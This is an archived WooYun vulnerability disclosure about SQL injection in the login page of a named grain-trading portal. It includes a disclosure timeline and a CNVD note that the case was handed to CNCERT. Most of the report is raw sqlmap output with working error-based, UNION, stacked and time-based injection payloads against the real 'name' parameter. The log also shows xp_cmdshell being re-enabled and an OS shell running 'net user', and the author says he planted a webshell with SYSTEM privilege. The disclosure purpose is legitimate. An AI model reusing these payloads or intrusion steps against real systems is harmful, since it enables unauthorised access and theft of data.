乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-20: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
注入.。。求邀请码
漏洞链接:http://tjgrain.com/userlogin.asp其中的name存在sql注入,话说这站好歹pr5,不应该存在这么明显的洞。。。sqlmap跑一下结果如下图
18个库
随表找了一个,里面有几十个表,这个站是粮油交易的门户网站,相关的交易信息就都在这些库了
写个shell进去,居然是system权限,服务器get
裤子太大,网速不给力就不脱了
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: name Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: job=login&name=' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58))) AND 'YrDi'='YrDi&pass=&submit=进 入 Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: job=login&name=' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+CHAR(69)+CHAR(109)+CHAR(88)+CHAR(103)+CHAR(73)+CHAR(86)+CHAR(88)+CHAR(88)+CHAR(87)+CHAR(82)+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'rnET'='rnET&pass=&submit=进 入 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: job=login&name='; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX&pass=&submit=进 入 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: job=login&name=' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy&pass=&submit=进 入---do you want to exploit this SQL injection? [Y/n][10:47:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[10:47:51] [INFO] testing if current user is DBA[10:47:51] [INFO] read from file 'C:\Python27\sqlmap\output\tjgrain.com\session': 1[10:47:51] [INFO] checking if xp_cmdshell extended procedure is available, please wait..[10:47:51] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y[10:48:05] [INFO] xp_cmdshell re-enabled successfully[10:48:06] [INFO] going to use xp_cmdshell extended procedure for operating system command execution[10:48:06] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTERos-shell> net userdo you want to retrieve the command standard output? [Y/n/a][10:48:15] [INFO] the SQL query used returns 1 entriescommand standard output:---\\ \b5\c4\d3\c3\bb\a7\d5\ca\bb\a7-------------------------------------------------------------------------------admin ASPNET Guest
过滤
危害等级:中
漏洞Rank:9
确认时间:2015-05-25 11:27
CNVD确认所述情况,已经转由CNCERT下发给天津分中心,由其后续协调网站管理单位处置。
暂无